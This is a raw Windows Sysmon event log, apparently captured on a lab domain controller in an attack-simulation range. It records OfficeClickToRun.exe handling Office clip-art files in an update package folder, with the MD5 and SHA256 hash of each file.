Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0171685.WMFMD5=858E61AC6AA7CB63A8A6E6D51E341725,SHA256=228EE7A7E76E8D60246AB0377605F7CE3C59BBE98D89B1403F891A491A30D2C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0168644.WMFMD5=438A766367475723950E3631645F4F59,SHA256=48957DF974DFEF99C4CFF2DAC4C5F2906EE714F09EB6E78FE81420D48FA27518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0164153.JPGMD5=FFB71EB436C01F53F6998C70AA8277CE,SHA256=51C10183E88CF43A854698EFA663099287508367D951551E9EB9FD151B5EFCE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0160590.WMFMD5=2D7F28530A83987CE95ECFD52CF9F400,SHA256=1D1C8853F6FB860019551276A301293910E5663A8ED1F5D1D79A27C2340D13F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0158477.WMFMD5=E66EE2A758B731F6FC8966055CB1407F,SHA256=E1B9318417365A8D0D78527F8CBE8064A9CF3CC94F4A2FA005E0C3526A64C423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0158071.WMFMD5=4ADEABD68DD048F34453B784CE004F19,SHA256=5406303947F64CFB3004B3BE17A1026547FAEE8338463DACBF70BD0B624CC2EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0157831.WMFMD5=5A02F3E27B3234B6359E05EF995DBEFA,SHA256=257B9DE6E307B1AF834BE063C3A8995B92D53868B835FE28976DD41E00DEF890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0157191.WMFMD5=C4A0C15EA9F183459BDFB9A3528F30ED,SHA256=65BA4A246E9EE189996C941D940B48AD6CB7B984BD7E3EB590BDFB810851E4E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0157177.WMFMD5=C8F64307479FC972999D9759CC682156,SHA256=B2DE109D588EC6FF575CC07628CDA6FB35592DCCCF0D8788E86B75381062A0E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0157167.WMFMD5=EB694A239F6EF43CB9984DF35FBF078F,SHA256=1EDDF8FB255EE854100814124799BCAB3834E8069BC9539717F1BB66E8D6AC4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0156537.WMFMD5=3CD37B27E4C0CD70F3C9717A8767B35E,SHA256=CA63DF5F88D563453C0C61DEEB2B45DEDEEB3911684AEB39D75C2D6E9CD33750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153518.WMFMD5=90916C7AE3A6FB3E6AC1CD3ADB63BA28,SHA256=72D0A992374CB0A7004735EF7D5270DC0BC186C485F505BDE28BC1953CC52A3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153516.WMFMD5=AB7109CFB0740DA440811680EACA268E,SHA256=80428C36719D513E4F736C089C922D298FD57E32CAC2B1E4B6EE98FA9D9FD405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153514.WMFMD5=120D41452DF527DCE5DCADE3804C8224,SHA256=0747BF4F2348204D3BFE87C2076E9D6907A7E683633CFB82DF18843E36637061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153508.WMFMD5=966FB9245E7967AF1F18D83F334B7410,SHA256=CCBCA505AFDC517821286844929C09839FBC727FD59310011C4FA2BF8749FF93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153398.WMFMD5=C6799E580B0963DC61027BDAA07ADDB7,SHA256=D3F06E7E0DD16FDDE0FCEF8B727354185839257EFADC6027DFF8C8845BDA5812,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153313.WMFMD5=4B05E470F971B1F821F2C49E43412AB3,SHA256=9EA82B4A263D6AB8A22050E09DCA4A068046E956458864FB7A786FEBAFB48E21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153307.WMFMD5=5AA4841CF1D957A3765F8968E1D4A23E,SHA256=F71F65AECF8D9BCA88C180C0B42D51660D4EEB10A524F6C9C9E53253FA00011E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153305.WMFMD5=D26E84123CD48ECA4D391D0FF9F4674E,SHA256=49F7913C5B15220304DBDE3957C62F68A131CBA0B566974613F3EDE996B6CEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153302.WMFMD5=5771461A48D21ADB65E7FFEC3BA4DE09,SHA256=C8F4FD2900777892C99A947B71944281A9CE1D13796386BC0FC961E923C38397,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153299.WMFMD5=BCF7DD88EBFD062FF8794C4C76CB23BA,SHA256=AF64646A8A56023BD98477BD200BA686CC71BC85B505E87405DB364352A0FFFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153273.WMFMD5=DC920818F93A7CDC8A0D8BB72B348EAF,SHA256=A45C1F56A29608C614E22A6F74035F5243F32D0A95FEE059E17B4E776952B8AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153265.WMFMD5=6E713F0DAA9D5A62A9F6D49C36B70DB6,SHA256=7A6CB95A47AA3E2CB82BC426C4C0B246535828608CC9AB233644589143A4AA6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153095.WMFMD5=BCB69FDE4AD05A6DCFE855C66DFC30F5,SHA256=BA99ED5BB697444764CBF167E930D65BBC6EE1765444DA1668E5F75C3F1FFAAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153093.WMFMD5=9FD44910E1F9D3AFF042E72E668ABDFE,SHA256=44EC39BA0957AAE3D979D5CDD811081F859E64F7ED5B32BAC6675FA0115A163D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153091.WMFMD5=09B8050A4029041E776E0447D9B21A79,SHA256=B0FFBF3DEB29738ACD3608434C8E8AE8CF82E05C4143CDFB4F6359645D0EFCB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153089.WMFMD5=A72EE3F017A27B72570F06F819F8861B,SHA256=C5F06E9B40BCE34D69F2DC63FF0BA247A3868377005A34F23EE35E5DE85A446E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153087.WMFMD5=DF06FDBB59B88FC8ABA9DB23A224A023,SHA256=4F3CBE83EC45872E9486DDD696CB697800752B9F32CD791641AA0383B08AF2A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0153047.WMFMD5=B3949F4CC7EBAAF6D6E3D22C610B7639,SHA256=9EA2EB79E6A3D9A23BA0FCAEDA66F20B06836EBB565736487996D0B4FE8E9562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152898.WMFMD5=73AB343233BC6F8B620B1930867B2D06,SHA256=2FD3F5A21025A3A5B4A11F979E7F31595F01F5D98D4EE464904E0F4795D1955A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152894.WMFMD5=ED35C6DB28FFE9C54AE87AF201E9870D,SHA256=429A389B1F8B0A35794BC5EAB49FBCBD06B442B80E1D32E195A7B61986C964D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152892.WMFMD5=9A62700E85B26B31BA9A416DB9D212AB,SHA256=D4362F04F3854D267AB3BA8EC97D43E45FAE7DF609054F2B45343431C350177C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152890.WMFMD5=5BB5C91D33C3AED955BC03F1815C69CC,SHA256=5C5D0500FBEDCB49BCE20077877B52D647AFE2CC7C61BED4BEC5F49D4F889E14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152884.WMFMD5=C8F2CA7158D6DB1DB40BB9E883790200,SHA256=547D2D23A3425F89A2C1EDFA52CEE0BA7C508C9FD7BF0E2B9D5C6302CAA3493D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152882.WMFMD5=545294787CB9DCF19E58040CA17FA321,SHA256=8189EC0852279FCC7624B87722F091DD76822F66E17A61D0DCB127B21BAE8163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152878.WMFMD5=2F0D1350BFF5260F5AB10F3C4F268013,SHA256=F7EF17A00B8FC7CFE510DE964EE9DB76102AE0615D4F1C78501919075799CEEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152876.WMFMD5=4FE73177954F6183D55619184F955F4B,SHA256=707F84A6E3DA554CBC4B29B18FE1F08814074B6A99A5F880464B465FB9FA3144,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152722.WMFMD5=94231DADCF06BFD335070689668CD602,SHA256=72BF32284D985EEE964ED3E4B508CDBCE001897F19DD99D2C68CFC5E84F21BF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152716.WMFMD5=AF5DEB4A262A7214C392965B7507EE9D,SHA256=75AD5D1660326E53F12D0791AAAA8B68E45AC61E50D8C2AF4F7F2BE350CE0075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152708.WMFMD5=BDA39A8A3A3661E79A5CED9EC641FB30,SHA256=8D27D353FB2E9D3E2062F0108E490E573B97D13DF5458556A8F7774BEFBC2355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152704.WMFMD5=5EB42B845FA1C810E4D4D621695620B9,SHA256=FFA2352E1EB2E40CE38A751D541F0D3874FA594B36F80725725B5481A56FDAF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152702.WMFMD5=5FF7FD26F9D9E02591216B114A96E3FB,SHA256=572488C6205670D4F183EE14AB59FFD660C3CA7DDE1B92CD322114A5D410021C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152698.WMFMD5=86B1CD9B90F0F4787C2376871FDDF341,SHA256=B956CEF2E8E8CE0EBDB96FB622E195B047553CA1E707D93E9FE3201311573149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152696.WMFMD5=FA2A7CF48FC3961E34ED96AD04600685,SHA256=7AC686C682E7F3FC82C1CD43780FA084C66C28928D0517838865D91E1D13EB4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152694.WMFMD5=95D3215916F374FF89B626DF5C951332,SHA256=235DEA815F294FBC7D2697B3E90FBD815D0C3087FC8D7EDC6F05CB0879DBE5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 